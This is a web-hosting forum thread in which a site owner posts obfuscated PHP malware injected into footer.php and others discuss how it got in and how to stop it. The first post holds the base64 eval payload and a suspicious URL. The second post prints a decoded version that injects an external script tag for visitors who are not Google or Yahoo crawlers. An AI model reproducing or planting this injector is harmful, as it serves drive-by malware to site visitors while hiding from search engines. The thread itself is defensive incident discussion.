Results 1 to 19 of 19
-
05-07-2010, 06:06 AM #1Newbie
- Join Date
- May 2009
- Posts
- 9
my site hacked by following php code
some hacker insert the following code to my footer.php
and AVG tell me that threat. Thanks AVG.
Code:<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
http://www1.firesavez5.com/?p=p52dcW...iaiglnOdmps%3D
I find that code and deleted it from my file. But I don't know how the hacker insert to my php file?
Thanks,
LeiLast edited by bear; 05-07-2010 at 09:55 AM.
-
05-07-2010, 08:16 AM #2Web Hosting Master
- Join Date
- Oct 2009
- Posts
- 865
Hard to say without more background information. It could be due to weak security on a shared hosting server, a compromised server, or a weakness in your web applications.
Just for fun, here's that chunk decoded and cleaned up somewhat.
Code:if(function_exists('ob_start') && !isset($GLOBALS['mr_no'])) { $GLOBALS['mr_no']=1; if(!function_exists('mrobh')) { if(!function_exists('gml')) { function gml() { if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) { return '<script src="http://indesignstudioinfo.com/ls.php"></script>'; } return ""; } } if(!function_exists('gzdecode')) { function gzdecode($var1) { $var3=@ord(@substr($var1,3,1)); $var2=10; if($var3&4) { $var4=@unpack('v',substr($var1,10,2)); $var4=$var4[1]; $var2+=2+$var4; } if($var3&8) { $var2=@strpos($var1,chr(0),$var2)+1; } if($var3&16) { $var2=@strpos($var1,chr(0),$var2)+1; } if($var3&2) { $var2+=2; } $var5=@gzinflate(@substr($var1,$var2)); if($var5===FALSE) { $var5=$var1; } return $var5; } } function mrobh($var6) { Header('Content-Encoding: none'); $var7=gzdecode($var6); if(preg_match('/\<\/body/si',$var7)) { return preg_replace('/(\<\/body[^\>]*\>)/si', gml()."\n".'$1', $var7); } else { return $var7.gml(); } } ob_start('mrobh'); } }
-
05-07-2010, 02:08 PM #3New Member
- Join Date
- May 2010
- Posts
- 1
Lei,
Same thing happened to me today. Every single PHP file on my server had that same line of code entered in it. I'm not sure how it happened or how to prevent it from happening again.
Garret
-
05-07-2010, 03:18 PM #4Newbie
- Join Date
- Oct 2004
- Posts
- 13
I'm sure there are several approached to getting this done, I'm no expert in this, but one of my "clients" had this problem and each time he removed it it was back the next day.
It turned out that when I went over his folders and files and set the correct permissions the problem stopped. For more info have a look at http://en.wikipedia.org/wiki/Chmod
-
05-07-2010, 04:41 PM #5Web Hosting Guru
- Join Date
- Nov 2005
- Posts
- 282
chmod is only protecting files from being modified by whatever method is being used. it isnt actually plugging the security vunerability that allowed it in the first place. Also chmod wont help you if your script is vunerable to injection by itself (and the permission the script is running under has write access), unless you set the files to read/execute only.
Ideally shared hosting enviroments should not allow users to modify other files on the server outside of their root path, if this is not the case trouble your host to correct it. If they arnt locked out of other users directories it will be possible for them to do possibly more things than inject a snippit of code into a php script, including obtaining usernames and passwords to your database stored in plaintext configuration files.
-
05-07-2010, 05:40 PM #6Newbie
- Join Date
- Oct 2004
- Posts
- 13
Thank you for clearing that up...
-
05-07-2010, 08:28 PM #7Newbie
- Join Date
- Apr 2010
- Posts
- 25
The most common method I have seen is the FTP credentials becoming compromised. This can be through brute force, especially with the commonly weak passwords most people use, or just through poor credential management (do you have yours on a sticky note attached to your monitor?). Make sure you approach the host about this issue and have *all* of your credentials changed, including FTP, shell access, control panel, etc. Any method configured for you to access the server should be updated with new credentials. Then go back through your content and remove the scripting.
-
05-08-2010, 12:15 AM #8Newbie
- Join Date
- May 2009
- Posts
- 9
If you still not get rid of this problem, please read http://www.wpsecuritylock.com/breaki...-on-dreamhost/
or
http://blog.sucuri.net/2010/05/simpl...or-latest.html
-
05-08-2010, 07:58 AM #9Web Hosting Master
- Join Date
- Oct 2009
- Posts
- 865
chmod will only help you if you're on a weakly secured shared hosting server, in the sense that it can stop other people on the server from changing your files. But if your host doesn't work with the files being owned by your own account, other people will still be able to read them, and extract things like database credentials which they can then use to access your database.
It's a jungle out there.
-
05-14-2010, 08:30 AM #10Junior Guru
- Join Date
- May 2010
- Location
- Online
- Posts
- 236
Samething happened for one of my clients , each file of his wordpress instalaltion got that dumb in side at the begining , we found a php script that clean up all files and also remove empty lines
tutorialsbay.com/wordpress-hacked-malware-redirect/
-
05-14-2010, 02:51 PM #11Newbie
- Join Date
- Jan 2010
- Location
- London
- Posts
- 10
Possibly a PHP Shell?
-
06-01-2010, 06:57 AM #12New Member
- Join Date
- Jun 2010
- Posts
- 1
I think this is weak security of file manager or picture manager plugins in wysiwyg editors like TinyMCE
here is our case in old Mambo CMS installation
lampwebdevelopers.com/199/web-developement/security-and-anti-spam/website-hack-through-tinymce-filemanager-plugin/
-
06-01-2010, 10:33 AM #13Disabled
- Join Date
- Apr 2009
- Posts
- 3,262
Make sure you ask your host to update your cPanel and PHP/MYSQL. Make sure that you update your PHP scripts as well. A lot of hosts probably don't follow the proper procedures in security as well unfortunately from what I have seen. As always, backup your site every week at least.
-
10-07-2010, 02:29 PM #14Newbie
- Join Date
- Oct 2010
- Posts
- 5
The people who create this code and hack it onto people's site are the most despicable of all internet criminals.
I believe I have a simple solution to this problem, at least to stop this scum from hurting your customers.
Their script finds every PHP file and prepends a chunk of PHP.
So use that against them. Include in every page as you would functions of a config file. If it's not in the same directory as your index file, obviously change the code to fit.
HTML Code:<?php # this file should be less than 570 chars in length $expected=570; $data=file_get_contents(__FILE__); //echo strlen($data); if (strlen($data)>$expected) { //mail('youremail','Website compromised '.$_SERVER['HTTP_HOST'],'taken offline','FROM: youremail'); if (!file_exists('index.phpx')) rename('index.php','index.phpx'); // write this despite the existance of index.phpx in case they strike again $fh = fopen('index.php', 'w') or die("can't open file"); fwrite($fh, 'Sorry, we are currently offline'); fclose($fh); } ?>
-
10-07-2010, 03:42 PM #15Aspiring Evangelist
- Join Date
- Aug 2009
- Location
- United Kingdom
- Posts
- 388
You can infect every page on a website with a PHP shell if they haven't secured PHP
-
10-07-2010, 03:46 PM #16Newbie
- Join Date
- Oct 2010
- Posts
- 5
as long as it also infects this one that's what I'm counting on.
-
10-08-2010, 10:29 AM #17Junior Guru
- Join Date
- Oct 2004
- Location
- Złocieniec, Poland
- Posts
- 191
chmod is weak one may put php file to use php chmod function, it might be also changed by ftp
better solution is to use "chattr +i" but u need shell access or... php shell (if your hosting provider allows for exec(), system() etc...)
beside who ever heard of chattr? no one? so haxorz wannabe dont know about it toowww.goscinnawies.pl - family business, small travel agency in Poland
-
10-08-2010, 10:34 AM #18Web Hosting Evangelist
- Join Date
- Jul 2008
- Posts
- 468
In response to OP:
This usually occurs because a computer that had FTP/cPanel access to the account picked up some malware which took stored credentials either from Firefox, IT, etc... or from popular FTP software password storage files (such as Filezilla's unencrypted password store) and used that to insert the code.
You should download MBAM (google it) and Avast/AVG/PrevX/etc and run them in full on any machine that has been compromised.
Then (and only then), clean the account and reset the password to something new.
-
10-08-2010, 10:56 AM #19Web Hosting Evangelist
- Join Date
- Sep 2008
- Posts
- 545
The following link explains it.
http://forums.oscommerce.com/topic/3...-64-infection/
Similar Threads
-
Hacked; Warning: count.php?o=2 code
By mifbody in forum Hosting Security and TechnologyReplies: 30Last Post: 07-31-2008, 06:50 AM -
How to show HTML and PHP code on a site?
By Eiolon in forum Programming DiscussionReplies: 11Last Post: 10-18-2007, 09:20 AM -
Site Hacked via php script placed in WordPress Uploads directory
By cnymike in forum Hosting Security and TechnologyReplies: 8Last Post: 04-08-2007, 08:38 AM -
PHP/MYSQL Trivia site code job
By mrsam in forum Employment / Job OffersReplies: 2Last Post: 11-26-2005, 03:30 PM -
Code my Teen Site in PHP and MYSQL.
By TeenGab.com in forum Employment / Job OffersReplies: 3Last Post: 08-22-2005, 04:27 AM